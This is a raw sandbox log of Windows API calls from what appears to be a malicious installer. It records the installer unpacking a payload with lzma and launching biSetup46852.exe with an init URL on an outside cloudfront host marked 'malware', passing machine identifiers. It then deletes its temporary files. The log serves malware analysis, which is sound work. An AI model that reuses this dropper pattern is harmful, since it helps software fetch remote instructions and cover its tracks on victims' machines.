desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#344440000
CreateFile
hName=3wsh81ka6f1kkt1hwi
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_ALWAYS
Return=ac
#359820000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#359820000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
desiredAccess=GENERIC_WRITE 
creationDisposition=CREATE_NEW
Return=ffffffff
#360780000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns7.tmp
desiredAccess=GENERIC_READ 
creationDisposition=CREATE_NEW
Return=c
#360820000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
desiredAccess=GENERIC_READ 
creationDisposition=OPEN_EXISTING
Return=c
#360820000
CopyFile
lpExistingFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
lpNewFileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns7.tmp
Return=1
#360880000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns7.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=ac
#360880000
CreateFile
hName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns7.tmp
desiredAccess=GENERIC_READ GENERIC_WRITE 
creationDisposition=OPEN_EXISTING
Return=ac
#363150000
LoadLibrary
lpFileName=advapi32.dll
Return=77dd0000
#361700000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns7.tmp" "C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\lzma.exe" "d" "C:\DOCUME~1\ants\LOCAL
Return=1
#361680000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns7.tmp" "C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\lzma.exe" "d" "C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\3wsh81ka6f1kkt1hwi" "C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\biSetup46852.exe"
Return=1
#361680000
CreateProcess
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns7.tmp" "C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\lzma.exe" "d" "C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\3wsh81ka6f1kkt1hwi" "C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\biSetup46852.exe"
Return=1
#365200000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns7.tmp
Return=1
#365200000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\ns7.tmp
Return=1
#365660000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\g10imao1b9m5a31
Return=1
#365660000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\g10imao1b9m5a31
Return=1
#365880000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\gw1jirkfqguoj
Return=1
#365880000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\gw1jirkfqguoj
Return=1
#366140000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\3wsh81ka6f1kkt1hwi
Return=1
#366140000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\3wsh81ka6f1kkt1hwi
Return=1
#369820000
LoadLibrary
lpFileName=advapi32.dll
Return=77dd0000
#367580000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\biSetup46852.exe" /initurl http://d3jspvihdmh1u2.cloudfront.net/init/malware/:uid:? /af
Return=1
#367580000
CreateProcessInternal
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\biSetup46852.exe" /initurl http://d3jspvihdmh1u2.cloudfront.net/init/malware/:uid:? /affid "-" /id "0" /name " " /uniqid malware /uuid stance(s) Available. /biosserial  /biosversion  /csname stance(s) Available.
Return=1
#367580000
CreateProcess
lpCommandLine="C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\biSetup46852.exe" /initurl http://d3jspvihdmh1u2.cloudfront.net/init/malware/:uid:? /affid "-" /id "0" /name " " /uniqid malware /uuid stance(s) Available. /biosserial  /biosversion  /csname stance(s) Available.
Return=1
#371670000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\biSetup46852.exe
Return=0
#371670000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\biSetup46852.exe
Return=0
#372780000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\DcryptDll.dll
Return=1
#372780000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\DcryptDll.dll
Return=1
#372900000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\lzma.exe
Return=1
#372890000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\lzma.exe
Return=1
#372970000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
Return=1
#372970000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\nsExec.dll
Return=1
#373040000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
Return=1
#373040000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\System.dll
Return=1
#373120000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\TempWmicBatchFile.bat
Return=1
#373120000
DeleteFile
fileName=C:\DOCUME~1\ants\LOCALS~1\Temp\nst2.tmp\TempWmicBatchFile.bat
Return=1
#373610000
ExitProcess
